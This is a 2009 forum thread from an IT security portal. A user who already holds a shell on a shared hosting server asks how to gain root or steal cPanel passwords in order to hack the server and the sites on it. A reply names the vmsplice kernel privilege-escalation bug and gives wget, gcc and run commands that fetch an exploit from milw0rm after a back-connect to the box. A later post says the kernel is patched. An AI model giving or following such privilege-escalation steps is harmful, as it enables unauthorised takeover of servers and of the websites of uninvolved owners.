Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
May 28, 2020
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 321
Members: 0
Total: 321
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Linux world -> VEry Urgant Please about LInux
Post new topic  Reply to topic View previous topic :: View next topic 
VEry Urgant Please about LInux
PostPosted: Sat May 23, 2009 10:01 pm Reply with quote
realcoder
Advanced user
Advanced user
 
Joined: May 19, 2009
Posts: 51




Well m in a server which have many sites thorugh shell uploaded but i can't upload any file & can't change permsission what i have to do for getting root access or cpanels passowords or any thing thorugh that i can hack that server or sites on that server
this is little server information

Linux server.servername.com 2.6.18-028stab060.2-ent #1 SMP Tue Jan 13 10:49:02 MSK 2009 i686 i686 i386 GNU/Linux
Linux 2.6.18-028stab060.2-ent
linux-gnu
Apache/1.3.41 (Unix) PHP/5.2.6 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl
Kernel info
Linux server.servername.com 2.6.18-028stab060.2-ent #1 SMP Tue Jan 13 10:49:02 MSK 2009 i686

Please somebody tell me what i do Crying or Very sad Crying or Very sad
View user's profile Send private message
PostPosted: Sun May 24, 2009 9:13 am Reply with quote
realcoder
Advanced user
Advanced user
 
Joined: May 19, 2009
Posts: 51




someone help plzzz Sad
View user's profile Send private message
PostPosted: Sun May 24, 2009 9:41 am Reply with quote
xF34Rx
Regular user
Regular user
 
Joined: May 10, 2009
Posts: 23




Its vuln to vmsplice(2.6.18 > 2.6.24.1)

Code:
http://milw0rm.com/exploits/5092


Back connect to the box and execute this:

Code:
wget http://milw0rm.com/exploits/5092
gcc 5092 -o xpl
./xpl


You should have root.
View user's profile Send private message
PostPosted: Sun May 24, 2009 11:47 am Reply with quote
realcoder
Advanced user
Advanced user
 
Joined: May 19, 2009
Posts: 51




Well Bro what's your ID & add me realcoder@live.com
View user's profile Send private message
PostPosted: Mon May 25, 2009 10:29 pm Reply with quote
x3roconf_
Advanced user
Advanced user
 
Joined: May 01, 2008
Posts: 101




xF34Rx wrote:
Its vuln to vmsplice(2.6.18 > 2.6.24.1)


It's patched againt vmsplice vuln.
See kernel build date: Tue Jan 13 10:49:02 MSK 2009
View user's profile Send private message
VEry Urgant Please about LInux
  www.waraxe.us Forum Index -> Linux world
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Nvidia GeForce Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.052 Seconds